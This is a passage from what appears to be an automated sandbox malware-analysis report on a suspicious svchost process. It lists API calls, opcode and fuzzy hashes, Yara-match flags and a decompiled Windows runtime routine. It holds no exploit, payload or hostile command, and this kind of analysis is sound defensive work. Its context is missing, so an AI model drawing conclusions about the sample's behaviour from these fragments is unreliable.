                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                • Instruction ID: 411bc137dc2e1f002826edd8ceb59b4be812fad8a250c55907a62f5fde97bf02
                                                                • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                • Instruction Fuzzy Hash: 9DE046B2210208ABCB18EF89DC44EA737ADEF88764F018454FE096B241C630F910CAF1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C3CCA0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C2E122,02C2E122,?,00000000,?,?), ref: 02C3CCD0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LookupPrivilegeValue
                                                                • String ID:
                                                                • API String ID: 3899507212-0
                                                                • Opcode ID: 3b3ebc9dfdd07f93e5458a11869c6f41762809d127f29865181a2f9f364af2cb
                                                                • Instruction ID: 5f0d094f1a0d5c0fbd307a296988540e131911db7b1f734d98d8e2372075ec8f
                                                                • Opcode Fuzzy Hash: 3b3ebc9dfdd07f93e5458a11869c6f41762809d127f29865181a2f9f364af2cb
                                                                • Instruction Fuzzy Hash: 64E01AB16002046BC714EF49CC44EE737ADAF88664F054464BA0957242D634F8108AF5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02C2E5D0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02C28D8A,?), ref: 02C2E601
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: d4c4fb61fca30dc6897689a68a201e21eddd4c07fd029ba9ad0561dc71e4192a
                                                                • Instruction ID: a079a0f4d721be944a0a3fedcb7e392b53be2a63514c630311e335a74b9481c4
                                                                • Opcode Fuzzy Hash: d4c4fb61fca30dc6897689a68a201e21eddd4c07fd029ba9ad0561dc71e4192a
                                                                • Instruction Fuzzy Hash: 99D05EB5B843083BF610A6E5DC42F16328D5B44654F084054F94CEB2C2DD50F1048AA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0326967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: f31d2b3560269148310cb6b0f8aac996724a2a61cec07223d104c697343430a0
                                                                • Instruction ID: a8b037ff2925b72428fa6a7ed6a57886a4223a5ae68299e7c40ba7e8d301b969
                                                                • Opcode Fuzzy Hash: f31d2b3560269148310cb6b0f8aac996724a2a61cec07223d104c697343430a0
                                                                • Instruction Fuzzy Hash: 36B09B719115C5C5E611D770470871779047FD0741F16C055D1020641A4778C0D1F5B5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Function 02C24DB1 Relevance: .0, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_2c20000_svchost.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 664d14b7991fb4393cbe6991365a45428e1e595262dc4b6fa0eee6f73339683b
                                                                • Instruction ID: 317a5ae395d5c81e3f3b354d330302efc411c5464da70251b7866c18df643b77
                                                                • Opcode Fuzzy Hash: 664d14b7991fb4393cbe6991365a45428e1e595262dc4b6fa0eee6f73339683b
                                                                • Instruction Fuzzy Hash: 5FC08C23F982040EE121080D3C422F0EB289393235F4022E3EC48E72919283CC12019A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 032BFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 53%
                                                                			E032BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0326CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E032B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E032B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                0x032bfdda
                                                                0x032bfde2
                                                                0x032bfde5
                                                                0x032bfdec
                                                                0x032bfdfa
                                                                0x032bfdff
                                                                0x032bfe0a
                                                                0x032bfe0f
                                                                0x032bfe17
                                                                0x032bfe1e
                                                                0x032bfe19
                                                                0x032bfe19
                                                                0x032bfe19
                                                                0x032bfe20
                                                                0x032bfe21
                                                                0x032bfe22
                                                                0x032bfe25
                                                                0x032bfe40

                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 032BFDFA
                                                                Strings
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032BFE2B
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032BFE01
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.523365530.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                • Associated: 0000000B.00000002.523365530.000000000331B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.523365530.000000000331F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_3200000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                • API String ID: 885266447-3903918235
                                                                • Opcode ID: 8e6136df9fff70bde611577223e7be9da7509c9bd9d084de34d69fea30fcdd8f
                                                                • Instruction ID: ff46c8ceedb32cb9d1a6187084d767e8c1908f94253325893b466e694481ec5a
                                                                • Opcode Fuzzy Hash: 8e6136df9fff70bde611577223e7be9da7509c9bd9d084de34d69fea30fcdd8f
                                                                • Instruction Fuzzy Hash: E2F02236210201BFD6209A45CD02F63BB6AEB41770F240214F6684A5D1DAA2B8B092E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%